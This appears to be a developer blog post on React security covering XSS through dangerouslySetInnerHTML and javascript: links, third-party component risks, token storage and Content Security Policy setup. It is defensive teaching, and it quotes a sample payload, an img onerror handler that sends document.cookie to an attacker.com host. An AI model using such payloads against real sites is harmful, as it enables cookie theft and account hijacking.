← Blog
·10 min read

React Security Best Practices: XSS, State, and CSP (2026)

React security best practices in 2026: how XSS happens in React apps, dangerouslySetInnerHTML risks, third-party component auditing, and Content Security Policy setup.

Rod

Founder & Developer

React's JSX escaping protects you from the most obvious cross-site scripting attacks. But that protection has gaps — and the gaps are exactly where React security vulnerabilities actually occur in production apps. dangerouslySetInnerHTML, third-party components that bypass React's rendering pipeline, href attributes with user-supplied values, and CSP configurations that are too permissive to be useful.

This post covers the React security best practices that matter in 2026: where XSS actually happens in React apps, how to handle rich content safely, what to look for in third-party components, and how to set up a Content Security Policy that works with React's architecture.


How React's Default XSS Protection Works (and Where It Stops)

React automatically escapes values you embed in JSX. This turns an attacker's attempt to inject a script tag into harmless text:

// React encodes this before rendering — safe
const userInput = '<script>alert("xss")</script>';
return <div>{userInput}</div>;
// Renders as literal text: <script>alert("xss")</script>
// Not as executable script

The encoding happens at the JSX level — React converts <, >, ", ', and & into their HTML entity equivalents before putting them into the DOM. An attacker can't break out of text context this way.

What React's escaping does NOT protect:

  • dangerouslySetInnerHTML — explicitly bypasses the escaping
  • href, src, and similar attributes with user-supplied values
  • Third-party components that use innerHTML internally
  • Dynamic <script> tag creation
  • eval() and new Function() with user data

dangerouslySetInnerHTML: The Obvious Risk

The name is the warning. dangerouslySetInnerHTML tells React to skip its escaping and inject raw HTML. When the HTML is user-generated or from an external source you don't fully control, this is an XSS vector.

// BAD: renders raw user content — XSS if content contains script tags
function UserComment({ content }: { content: string }) {
  return <div dangerouslySetInnerHTML={{ __html: content }} />;
}

If content is <img src=x onerror="fetch('https://attacker.com?cookie='+document.cookie)">, you've just exfiltrated your user's cookies.

The fix: sanitize before rendering

import DOMPurify from "dompurify";
 
// GOOD: sanitize user content before rendering as HTML
function UserComment({ content }: { content: string }) {
  const sanitized = DOMPurify.sanitize(content, {
    ALLOWED_TAGS: ["b", "i", "em", "strong", "p", "br"],
    ALLOWED_ATTR: [], // no attributes — prevents event handler injection
  });
 
  return <div dangerouslySetInnerHTML={{ __html: sanitized }} />;
}

DOMPurify is the standard library for this. It strips executable content from HTML while preserving formatting tags. Configure ALLOWED_TAGS and ALLOWED_ATTR to match exactly what your use case needs — the tighter the allowlist, the safer the output.

When can you use dangerouslySetInnerHTML safely?

When the content source is controlled by you: your own CMS, Markdown you converted to HTML with a trusted library, or content that went through sanitization on the server before storage. Never use it with raw user input.


The Less Obvious XSS: href with JavaScript Protocols

React escapes text content. It does not prevent javascript: protocol URLs in link attributes.

// BAD: user-supplied href can be javascript: protocol
function ProfileLink({ href, label }: { href: string; label: string }) {
  return <a href={href}>{label}</a>;
  // If href is "javascript:alert(document.cookie)", clicking it executes JS
}

This vector shows up in apps that let users customize their profile link, specify a "website URL," or submit any other URL that gets rendered as an anchor tag.

// GOOD: validate the protocol before rendering
function ProfileLink({ href, label }: { href: string; label: string }) {
  const isSafeUrl = href.startsWith("https://") || href.startsWith("http://");
  const safeHref = isSafeUrl ? href : "#";
 
  return (
    <a href={safeHref} rel="noopener noreferrer">
      {label}
    </a>
  );
}

The same applies to src attributes, action attributes on forms, and anywhere a URL from user input ends up as an HTML attribute.


Third-Party React Components: The Hidden Risk

When you install a React component library, you're trusting that library's code to run in your users' browsers with the same permissions as your own code. A compromised or malicious npm package can steal cookies, exfiltrate data, and manipulate the DOM — and it would look like your own app doing it.

This isn't theoretical. Supply chain attacks against npm packages have happened multiple times and the problem is getting worse. The Veracode 2025 State of Software Security report called out software composition as one of the highest-risk areas for web applications.

What to check before installing a UI component:

# Check for known CVEs in the package
npm audit --package-lock-only
 
# Check download count, last publish date, and open issues on npmjs.com
# A package last published 3 years ago with open security issues is a risk

For components that will render user content (rich text editors, markdown renderers, HTML formatters):

  • Read the component's source or at least its README to see if it uses dangerouslySetInnerHTML internally
  • Check whether it sanitizes user content before rendering
  • Check its GitHub issues for open XSS reports

The component categories that need the closest scrutiny:

  • Rich text editors (Quill, TipTap, Draft.js)
  • Markdown renderers that output HTML
  • PDF viewers
  • Image or video upload components
  • Any component that renders user-generated content

State Management Security: Don't Store Secrets in State

React state is accessible from browser DevTools. Anyone who opens your app in a browser can inspect component state, Redux store, and Zustand state. This is by design — it's useful for debugging.

The implication: never store sensitive values in client-side state.

// BAD: sensitive values in state are visible in DevTools
const [apiKey, setApiKey] = useState(process.env.REACT_APP_SECRET_KEY);
const [authToken, setAuthToken] = useState(response.token);
 
// GOOD: keep sensitive values server-side
// Tokens for auth go in httpOnly cookies (not accessible to JS)
// API keys that must be used client-side get limited scopes

What's safe to put in React state:

  • UI state (which tab is open, modal visibility, form field values)
  • Publicly-available data fetched from your API
  • User preferences that aren't sensitive

What to keep server-side or in httpOnly cookies:

  • Authentication tokens
  • Session identifiers
  • Any credential that proves who the user is

httpOnly cookies are set by your server, not by JavaScript. A script injected via XSS cannot read them — which is why they're the correct storage mechanism for auth tokens, not localStorage or React state.


Content Security Policy for React Apps

A Content Security Policy (CSP) is an HTTP header that tells browsers which sources your app is allowed to load scripts, styles, images, and other resources from. It's the last line of defense against XSS — even if an attacker manages to inject code, a properly configured CSP can prevent that code from loading external resources or executing.

The challenge with React and CSP: React itself generates inline scripts and styles, especially in development mode and during hydration. A strict CSP that blocks all inline scripts will break React.

The two approaches for React + CSP:

1. Nonce-based CSP (recommended for Next.js)

Each request gets a unique nonce (a random token). Inline scripts are allowed only if they include that nonce.

// next.config.ts — headers with nonce support
// Next.js 14+ supports this natively through middleware
// middleware.ts
import { NextResponse } from "next/server";
 
export function middleware(request: Request) {
  const nonce = crypto.randomUUID().replace(/-/g, "");
  const response = NextResponse.next();
 
  response.headers.set(
    "Content-Security-Policy",
    `default-src 'self'; script-src 'self' 'nonce-${nonce}'; style-src 'self' 'nonce-${nonce}'; img-src 'self' data: https:; font-src 'self';`
  );
 
  return response;
}

2. Hash-based CSP

Hash-based CSP allows specific inline scripts by their SHA hash. Less flexible for dynamic content but simpler to implement for static sites.

Start in report-only mode:

// Report violations before enforcing — catches what your app actually needs
"Content-Security-Policy-Report-Only": "default-src 'self'; report-uri /api/csp-report"

Run report-only mode in staging. Review the violation reports. Build your policy based on what your app actually loads. Then switch to enforcing mode.

The Next.js security headers guide covers the full recommended headers configuration including CSP setup for Next.js apps specifically.


React Security Scanning: What Automated Tools Catch

A static analysis scanner running against your React codebase will catch:

  • dangerouslySetInnerHTML usage without sanitization
  • eval() and new Function() patterns
  • href attributes with dynamic values (flagged for manual review)
  • Dependencies with known CVEs (your React component libraries included)
  • Missing security headers on your deployed app

What scanners don't catch well: design-level issues, whether your CSP is actually effective, or whether a third-party component is malicious (it looks like legitimate code until it isn't).

Scan your React repo free to see which of these show up in your codebase. The scan covers your package.json dependencies (including React libraries), code patterns, and your deployed URL's security headers.


Quick Reference: React Security Checklist

  • Avoid dangerouslySetInnerHTML — if you need it, sanitize with DOMPurify first
  • Validate URL protocols before using user-supplied values in href or src
  • Audit third-party components that render user content
  • Store auth tokens in httpOnly cookies, not localStorage or React state
  • Set a Content Security Policy on your deployed app
  • Enable rel="noopener noreferrer" on all external links
  • Run npm audit after any dependency update
  • Scan your repo periodically for new dependency vulnerabilities

Frequently Asked Questions

Is React secure by default?

React has good XSS defaults — JSX automatically escapes values rendered in templates, which prevents most basic XSS attacks. But React's protection only covers JSX rendering. It doesn't protect against dangerouslySetInnerHTML, href attributes with javascript: protocols, third-party components that manipulate the DOM directly, or server-side rendering misconfigurations. React is a safer starting point than raw DOM manipulation, but "secure by default" overstates it.

What is XSS in React and how does it happen?

XSS in React happens when untrusted user content gets rendered as executable code rather than inert text. React prevents this in JSX by default. XSS in React typically occurs through dangerouslySetInnerHTML, href attributes containing javascript: URLs, third-party libraries that use innerHTML directly, or eval() patterns.

Is dangerouslySetInnerHTML safe to use?

dangerouslySetInnerHTML is safe when the content has been properly sanitized before rendering. The danger is using it with unsanitized user input, CMS content, or any external data you don't control. If you need to render HTML, sanitize it first with DOMPurify. If you don't need to render HTML specifically, use a different approach.

How do I add Content Security Policy to a React app?

For a Next.js app, add CSP as a response header in next.config.ts or via middleware with nonce support. For React apps on other hosting, set it as an HTTP header on your server or CDN. Start with Content-Security-Policy-Report-Only to identify violations before enforcing.

Should I audit third-party React components for security?

Yes — especially components that handle user input, render HTML, or have access to authentication state. Check the package's maintenance history, download count, and whether it has known CVEs. For components that render user-generated content, verify whether they use dangerouslySetInnerHTML internally and whether they sanitize before rendering.


Scan your repo free →

reactsecurityXSSCSPfrontend-securityjavascript